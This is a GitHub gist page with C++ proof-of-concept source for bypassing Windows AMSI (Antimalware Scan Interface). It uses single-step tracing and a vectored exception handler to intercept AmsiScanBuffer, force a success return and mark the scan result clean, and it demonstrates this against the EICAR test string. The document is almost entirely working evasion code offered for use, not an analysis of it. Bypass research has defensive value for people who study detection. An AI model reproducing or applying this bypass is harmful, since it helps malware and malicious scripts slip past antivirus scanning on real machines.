-
-
Save rmusser01/b501e6a403659d9947df73e4959e1a8c to your computer and use it in GitHub Desktop.
(VEH) AMSI Bypass without Memory Patch
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Exception-Based AMSI Bypass | |
| // by [email protected] | |
| #include <amsi.h> | |
| #include <iostream> | |
| #include <Windows.h> | |
| #pragma comment(lib, "amsi.lib") | |
| #pragma comment(lib, "ole32.lib") | |
| #pragma warning( disable : 4996 ) | |
| #define AMSIPROJECTNAME L"scanner" | |
| HAMSICONTEXT context{ 0 }; | |
| AMSI_RESULT amsiRes = AMSI_RESULT_DETECTED; | |
| HAMSISESSION session = nullptr; | |
| void veh_AmsiScanHijack() { | |
| AddVectoredExceptionHandler(0, PVECTORED_EXCEPTION_HANDLER([](PEXCEPTION_POINTERS pexinf) -> LONG { | |
| if (pexinf->ExceptionRecord->ExceptionCode != EXCEPTION_SINGLE_STEP) | |
| return EXCEPTION_CONTINUE_SEARCH; | |
| if (size_t(AmsiScanBuffer) == pexinf->ContextRecord->Eip) { | |
| pexinf->ContextRecord->Eax = S_OK; | |
| pexinf->ContextRecord->Eip = ((uint32_t*)pexinf->ContextRecord->Esp)[0]; | |
| *(AMSI_RESULT*)((uint32_t*)pexinf->ContextRecord->Esp)[6] = AMSI_RESULT_CLEAN; | |
| pexinf->ContextRecord->Esp += (0x18 + 1) * sizeof(uint32_t); | |
| } | |
| if (!strncmp((PCHAR)pexinf->ContextRecord->Eip, "\xCC", 1)) | |
| pexinf->ContextRecord->Eip += 1; | |
| else if (*(PBYTE)pexinf->ContextRecord->Eip != 0xea && *(PWORD)(pexinf->ContextRecord->Eip + 5) != 0x33) | |
| pexinf->ContextRecord->EFlags |= 0x100; | |
| return EXCEPTION_CONTINUE_EXECUTION; | |
| })); | |
| _asm { | |
| pushfd | |
| or dword ptr[esp], 0x100 | |
| popfd | |
| } | |
| } | |
| void main() { | |
| // Init AMSI | |
| CoInitializeEx(0, COINIT_MULTITHREADED); | |
| AmsiInitialize(AMSIPROJECTNAME, &context); | |
| AmsiOpenSession(context, &session); | |
| puts("[+] Scanning EICAR Sample ..."); | |
| // Scan EICAR | |
| veh_AmsiScanHijack(); | |
| #define EICAR "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" | |
| if (AmsiScanBuffer(context, (LPVOID)EICAR, sizeof(EICAR), L"useless", session, &amsiRes) != S_OK) | |
| puts("[!] AmsiScanBuffer failed. Did you disable something for Windows Defender?"); | |
| _asm _emit 0xCC; | |
| printf("[+] RiskLevel Score = %i\n", amsiRes); | |
| printf("[+] Malicious? %s\n", AmsiResultIsMalware(amsiRes) ? "TRUE" : "FALSE"); | |
| system("PAUSE"); | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment